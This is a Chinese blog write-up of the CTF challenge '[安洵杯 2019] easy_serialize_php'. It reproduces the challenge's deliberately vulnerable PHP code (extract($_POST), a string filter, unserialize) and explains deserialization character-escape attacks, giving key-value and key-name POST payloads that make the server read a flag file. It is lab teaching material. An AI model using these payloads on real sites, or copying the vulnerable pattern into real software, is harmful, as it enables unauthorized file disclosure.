[CTF][安洵杯 2019]easy_serialize_php 1 -- 反序列化漏洞、反序列化字符逃逸

最新推荐文章于 2022-09-23 19:47:44 发布
最新推荐文章于 2022-09-23 19:47:44 发布
阅读量1.2k 收藏 7
点赞数 3
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45841815/article/details/119934050
版权

PHP逆向 序列化安全 flag逃逸 键值/键名逃逸 恶意代码构造
关键词由CSDN通过智能技术生成

[安洵杯 2019]easy_serialize_php 1
首先打开靶机,只有一个链接没有其他东西
在这里插入图片描述
目录爆破没有爆破出来东西,打开链接,发现给出了网站源码

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}
?>

可以看得到有执行phpinfo()的语句,尝试调用,然后搜索flag相关的内容,没有结果,在搜索f1ag相关的内容
在这里插入图片描述

代码分析

代码审计我最头疼,最烦看别人代码,趁这个机会培养一下习惯

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}
把传入的值中含有非法字符的字符串去掉,如aaaflagbbb会变成aaabbb

$function = @$_GET['f'];

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
由于有extract($_POST);的原因,可以以post的方法来修改user和funcrtion(不清楚原理是什么)
$function变量的值会通过get方法,将f的内容传过来
而$_SESSION["user"]$_SESSION['function']的内容可以通过post的方式传递
当以get方法传入img_path的情况下,$_SESSION['img']为传入的img_path(要经过base64加密和sha1加密)

在这里插入图片描述

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}_SESSION序列化且过滤,将值赋给$serialize_info
当get传入的f的值,也就是$function的值等于'show_image'时,就会将$serialize_info反序列化,然后将值赋给$userinfo['img']指向的文件(base64解密后)
最后将会高亮userin

总体
在这里插入图片描述
我们主要用到的就这一句

echo file_get_contents(base64_decode($userinfo['img']));

利用方法

代码会将userinfo中的[‘img’]值做base64解码,然后吧提到的整个文件读入一个字符串中,所以我们就要构造img的值,让代码读出内容,经过上文的分析,想要修改img的值可以通过设置img_path,或者修改userinfo[‘img’]的内容

首先看修改img_path
这个方法有一个问题,修改img_path,传入的内容会被base64和sha1加密$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));,然而,高亮文件内容时只做了base64的解密,所以修改img_path是无法读到文件的,所以只能修改userinfo[‘img’]的内容

userinfo[‘img’]的内容由_SESSION组成,所以我们可以修改user和function,考虑到有过滤,可以采用反序列化字符逃逸来构造SESSION[‘img’]的值
首先_SESSION一共有三个键值对,所以我们一共要构建三个键值对,反序列化字符逃逸的原理比较好理解,就是在构造键值的时候故意构造出会被过滤的的值,然后会被过滤函数给过滤掉,但是序列化后的字符串记录的值的长度却不会因为被过滤后而改变,所以就会把序列化后的字符串的结构当做值的内容给读取,如果我们自己构造出反序列化字符串的结构,并因为过滤破坏掉原来的结构,就可以构造出恶意代码,下面根据题目详细解释
反序列化字符逃逸一共有两种方法:一个是键值逃逸,另一个是键名逃逸

键值逃逸
键值逃逸就是被过滤的字符位置位于上传数据的值得位置
修改代码,增加一个输出语句
在这里插入图片描述
当不传入任何东西时,序列化后的字符串为
在这里插入图片描述
修改一下值
在这里插入图片描述

可以看到,flag被过滤掉了,但是长度却没有变,所以PHP读到的user的值其实为";s:8:"funct,共12位
所以,如果想要构建代码,只能在user的值做恶意代码然后让其被过滤,然后在function构建代码,让function构建的代码生效
由此可以推测出,payload:_SESSION[user]=flagflagflagflagflagphp&_SESSION[function]=";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:6:"hacker";s:4:"hack";}
在这里插入图片描述

4个flag加上1个php,共23位被过滤,结果就是";s:8:"function";s:59:"被当做了user的值,而构造出来的";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:6:"hacker";s:4:"hack";}却成为了新的键值对,后面的hacker是因为SESSION一共有三个键值对,所以要填满
然后可以在源代码中看到
在这里插入图片描述
键名逃逸
原理和上面一样,只不过这次被过滤的地方不是在值的位置,而是在键名的位置,然后在值的位置构造恶意代码
payload_SESSION[flagphp]=;s:6:"hacker";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
本地的输出截图
在这里插入图片描述
可以看到,被过滤了7个字符,所以";s:53:被当做成了键名,然后构造的hacker被当做成了值,后面的原理就一样了

然后根据提示$flag = 'flag in /d0g3_fllllllag';,flag在/d0g3_fllllllag,将/d0g3_fllllllagbase64加密得到,L2QwZzNfZmxsbGxsbGFn再继续逃逸即可得出结果

Gh0st_1n_The_shell
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
ctf序列化
小飒的博客
08-19 1088
一、基础 序列化和反序列化 php中的两个函数 序列化函数:serialize() 反序列化函数:unserialize() 当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 具体使用如下: <?php class xu{ var $a='1'; } $class1=new xu; echo serialize($class1); ?> 运行结果:O:2:“xu”:1:{s:1:“a”;s:1:“1”;} 反序列化 &
buuctf web easy_serialize_php1
qq_41696858的博客
12-09 491
审计源码 <?php $function = @$_GET['f']; //正则匹配 function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SES
[安洵 2019]easy_serialize_php 1
m0_62879498的博客
05-08 3081
[安洵 2019]easy_serialize_php 1 进入环境,我们首先查看 index.php 源码 代码审计: $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,''
buuctf-[安洵 2019]easy_serialize_php (小宇特详解)
小宇的web博客
02-24 1761
buuctf-[安洵 2019]easy_serialize_php (小宇特详解) 1.先看题目,出现了一段代码,进行代码审计 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_repla
[2019]easy_serialize_php 1
qq_53460654的博客
09-28 1296
打开环境得到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSIO
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
php反序列化长度变化尾部字符逃逸(0CTF-2016-piapiapia)
10-15
PHP反序列化长度变化尾部字符逃逸】是一种安全漏洞利用技术,通常出现在使用PHP的系统中。在PHP中,对象序列化是将对象转换为可存储或传输的字符串的过程,而反序列化则是将这个字符串恢复为原始对象的过程。...
ActiveMQ 反序列化漏洞(CVE-2015-5254)利用工具
08-15
在2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
[安洵 2019]easy_serialize_php
m0_63253040的博客
09-23 512
然后利用变量覆盖得到SESSION[img],中间会给我们制造一个SESSION[img]但是不是我们要的,需要去绕过它。unserialize会把多余的字符串当垃圾处理,在花括号内的就是正确的,花括号后面的就都被扔掉。所以利用filter函数去过滤字符使得前面的既有我们想要的,又成立,可以绕过后面的img。在变量覆盖的后面,所以我们不能直接去读,这里利用反序列化字符逃逸绕过。这样我们前面的刚好满足反序列化,后面的就可以绕过了。首先我们构造一个序列化的img。值绕过,原理是相似的。
UNCTF2021-easyserialize
m0_61666690的博客
12-07 518
前言 算是第一次独立做出来的一道web题,想了我两天。。。 本题利用到的知识点: 1.PHP反序列化字符逃逸 UNCTF2020的一道easyunserialize,类似 2.目录穿越 UNCTF2020的一道easy_ssrf,类似 3.pop链 BUUCTF的ezpop,类似 灵感就来源于这两道题 一、源码 二、POP链构造 1.function.php 先看哪里可以利用到flag 可以看到me7eorite这个类里有readfile函数,可以用来读flag 但是有
CTF——Web——PHP序列化和反序列化
小锤队长的博客
08-09 5733
PHP 序列化和反序列化: 1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程; 反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。 常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode 在进行类的序列化...
php serialize ctf,CTF代码审计之[安洵 2019]easy_serialize_php
weixin_39569894的博客
03-26 215
[安洵 2019]easy_serialize_php考点:php反序列化逃逸}if($_SESSION){unset($_SESSION);}$_SESSION["user"] = ‘guest‘;$_SESSION[‘function‘] = $function;extract($_POST);if(!$function){echo ‘source_code‘;}if(!$_GET[‘img...
BUUCTF-[羊城]Easyser
m0_52358157的博客
06-11 989
BUU:[羊城 2020]EasySer –菜鸟的第一篇ctf题解 一开始拿到题目一面懵,于是常规的查看robots.txt,很幸运提示要你去访问/star1.php 进入到这个界面接着遇事不决f12得到提示使用一个不安全协议获取ser.php 然后开始了漫长的各种尝试:各种php伪协议,各种百度去搜寻不安全的协议,并没有什么结果。后来想到有一位师傅讲过http相对比于https是不安全的,因为它无状态,无连接,具有简单快速、灵活的特性,通信时候使用明文,也不会对通信方进行确认(重点在这!) 所以可以利
CTF-web_php_serialize反序列化
Be Smart
02-24 843
一.根据题目猜测和反序列化漏洞有关 1.思路: 进入实验环境后,发现是一段php代码,通过接受get请求方式将提交过来的var的值, 先进行base64解码,再进行正则的判断,如果不匹配成功就会反序列化输入的参数值。 所以这里我们目的就是为了绕过正则表达式,让其反序列化出我们要的fl4g.php,再通过析构函数,高亮出fl4g文件中的内容。 2.步骤: 通过代码中的注释我们发现flag在fl4g.php这个文件里面,所以我们要将其序列化 编写一段代码先实例化我们要序列化的类,这里吧fl4g.php传进去,
CTF—Python考点 SSTI&反序列化&字符
qi_SJQ_的博客
03-01 3955
ctf题型分类: 1.CTF—Python—支付逻辑&JWT&反序列化: 题目:2019 CISCN 华北赛区Day1 Web2(全国大学生信息安全竞赛) 先写个爆破请求脚本,爬取请求到内容页面哪个存在lv6图片,得到在181页: 或者这个脚本,都可以: import requests url = "http://web44.buuoj.cn/" for i in range(1, 2000): r = requests.get(url + "shop?page=" + st
[校赛] - Web - EzSerialize
1tachi的博客
11-30 345
源码 <?php highlight_file(__FILE__); class flag{ public $key; public function __destruct(){ if($this -> key === 'yes'){ include('flag.php'); echo $flag; }else{ die("No,You don't have key!");
buuCTF [ISITDTU 2019]EasyPHP 1
weixin_45642610的博客
08-08 785
buuCTF [ISITDTU 2019]EasyPHP 1 直接代码审计。 第一个if,过preg_match。一般有三种方法:取反绕过,异或绕过,转义绕过。 这里用取反绕过。 第二个if的意思是输入的字符串不重复的字符长度不超过0xd即13。如aaa((bc不重复字符为a(bc长度为4。 尝试phpinfo: ?_=(%ff%ff%ff%ff%ff%ff%ff^%8f%97%8f%96%91%99%90)(); 可以去看看disable_function禁了哪些函数。 附上异或php脚本: &lt
PHP反序列化漏洞 ctfhub
最新发布
07-28
PHP反序列化漏洞是一种常见的Web应用程序漏洞,它允许攻击者通过操纵序列化和反序列化过程来执行恶意代码。这种漏洞通常出现在PHP应用程序中,特别是在使用不安全的反序列化函数(如`unserialize()`)时。 CTFHub是一个CTF(Capture The Flag)平台,旨在提供安全竞赛和训练平台,供安全爱好者学习和应对各种网络安全挑战。在CTFHub中,可能会涉及到PHP反序列化漏洞作为一个题目或挑战,参与者需要通过利用该漏洞来获取目标系统的控制权或敏感信息。 为了防止PHP反序列化漏洞,开发人员应该采取以下几个措施: 1. 验证和过滤用户输入:确保反序列化的数据来自可信任的来源,并对输入进行严格的验证和过滤,以防止恶意数据的注入。 2. 使用安全的序列化库:使用经过审计和被广泛接受的序列化库,如JSON或Protocol Buffers,而不是不安全的`unserialize()`函数。 3. 最小化反序列化操作:只反序列化必要的数据,并避免反序列化不受信任的或未知的数据。 4. 对敏感数据进行加密:如果必须在序列化过程中传输敏感数据,应该对其进行加密,以防止泄露。 希望以上信息对你有所帮助。如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值